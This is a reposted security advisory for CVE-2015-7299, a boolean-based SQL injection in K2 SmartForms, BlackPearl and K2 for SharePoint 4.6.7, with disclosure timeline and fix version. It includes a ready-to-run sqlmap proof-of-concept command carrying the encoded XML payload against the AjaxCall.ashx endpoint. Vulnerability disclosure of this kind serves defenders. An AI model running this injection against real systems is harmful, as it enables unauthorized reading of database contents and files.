Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

K2 SmartForms / BlackPearl SQL Injection

Related Vulnerabilities: CVE-2015-7299  
Publish Date: 13 Oct 2015
Author: Wissam Bashour
Source 
                							

                Title: Boolean-based SQL injection Vulnerability in K2 Platforms.
Author: Wissam Bashour - Help AG Middle East
Vendor: K2
Product: SmartForms, BlackPearl, K2 for sharepoint 
Version: 4.6.7
Tested Version: Version 4.6.7
Severity: HIGH
CVE Reference: CVE-2015-7299

# About the Product: K2 smartforms can pull and push information from line-of-business systems — SharePoint, CRM, SAP and others — and they can be used in the cloud with applications like Salesforce.com. The built-in K2 SmartObject technology allows true reusability of SmartForms components across multiple SmartForms, in multiple applications.


# Description: 
This Boolean-based SQL injection vulnerability enables an anonymous attacker to read sensitive data from the database, and recover the content of a given file present on the DBMS file system.
 
# Vulnerability Class: 
SQL injection - https://www.owasp.org/index.php/SQL_Injection)

# How to Reproduce: (POC):
Host the attached code in a webserver. Then go for the xml parameter that calls the AJAXCall.ashx in the smart object for the SharePoint.
You can see that the parameter doesn’t sanitize SQL queries. 

# Disclosure: 
Discovered: September 20, 2015
Vendor Notification: September 22, 2015
Advisory Publication: October 13, 2015
Public Disclosure: October 15, 2015

# Solution: 
Upgrade to 4.6.10 or later will fix this issue.
The new version number is 4.6.10 (4.12060.1690.2)
Release date: June, 2015 
 

# credits: 
Wissam Bashour
Associate Security Analyst
Help AG Middle East

# Proof of Concept Code:
https://raw.githubusercontent.com/Siros96/Boolean-SQL-injection/master/PoC

# Boolean-SQL-injection
# this is the sqlmap code
sqlmap --url="http://eforms.####/Runtime/Runtime/AjaxCall.ashx" --data="xml=%253Cbrokerpackage%253E%253Csmartobject%2520guid%253D%25227986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%2520resultname%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%253E%253Cmethod%2520name%253D%2522List%2522%253E%253CSorters%253E%253CSorter%2520OrderBy%253D%2522FirstName%2522%2520OrderByResultName%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%2520Direction%253D%2522ascending%2522%252F%253E%253C%252FSorters%253E%253Cfilter%253E%253CFilter%253E%253COr%253E%253CContains%253E%253CItem%2520SourceType%253D%2522ObjectProperty%2522%2520SourceID%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3.FirstName%2522%2520DataType%253D%2522Text%2522%253EFirstName%253C%252FItem%253E%253CItem%2520SourceType%253D%2522Value%2522%253E%253CSourceValue%253E*%253C%252FSourceValue%253E%253C%252FItem%253E%253C%252FContains%253E%253CContains%253E%253CItem%2520SourceType%253D%2522ObjectProperty%2522%2520SourceID%253D%2522Association_41f4b785-0bc3-0ef6-2d81-25509c13c3bd_7986fc5b-633a-44bb-9a90-ed1c4f4c0bc3.LastName%2522%2520DataType%253D%2522Text%2522%253ELastName%253C%252FItem%253E%253CItem%2520SourceType%253D%2522Value%2522%253E%253CSourceValue%253E*%253C%252FSourceValue%253E%253C%252FItem%253E%253C%252FContains%253E%253C%252FOr%253E%253C%252FFilter%253E%253C%252Ffilter%253E%253C%252Fmethod%253E%253Cparameter%2520name%253D%2522jobtitleid%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cparameter%2520name%253D%2522departmentid%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cparameter%2520name%253D%2522divisionid%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cparameter%2520name%253D%2522employeeid_1%2522%253E%253CSourceValue%253E%253C!%255BCDATA%255Bscnull%255D%255D%253E%253C%252FSourceValue%253E%253C%252Fparameter%253E%253Cresults%253E%253CResult%2520SourceType%253D%2522Result%2522%2520SourceID%253D%25227986fc5b-633a-44bb-9a90-ed1c4f4c0bc3%2522%2520SourceInstanceID%253D%2522db445b19-c6b2-146a-6e30-9096a4cfd3ea%2522%2520TargetType%253D%2522Control%2522%2520TargetID%253D%2522db445b19-c6b2-146a-6e30-9096a4cfd3ea_41f4b785-0bc3-0ef6-2d81-25509c13c3bd%2522%2520TargetInstanceID%253D%2522db445b19-c6b2-146a-6e30-9096a4cfd3ea%2522%252F%253E%253C%252Fresults%253E%253C%252Fsmartobject%253E%253Cmetadata%253E%253Cid%253E9e06faa7-1d6b-48b9-960b-cd7e64c4b7d5%253C%252Fid%253E%253Cmethodexecuted%253EList%253C%252Fmethodexecuted%253E%253Ctypeofview%253ECapture%253C%252Ftypeofview%253E%253Cidofcontrol%253Edb445b19-c6b2-146a-6e30-9096a4cfd3ea_41f4b785-0bc3-0ef6-2d81-25509c13c3bd%253C%252Fidofcontrol%253E%253Cinstanceid%253Edb445b19-c6b2-146a-6e30-9096a4cfd3ea%253C%252Finstanceid%253E%253Cpagenumber%253E1%253C%252Fpagenumber%253E%253Cpagesize%253E10%253C%252Fpagesize%253E%253Cfieldbehaviorignoreresults%253Etrue%253C%252Ffieldbehaviorignoreresults%253E%253C%252Fmetadata%253E%253C%252Fbrokerpackage%253E" --auth-type=NTLM --auth-cred=###### --dbms="mssql"



#References:
[1] help AG middle East http://www.helpag.com/.
[2] http://www.k2.com/
[3] https://www.owasp.org/index.php/SQL_Injection
[4] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started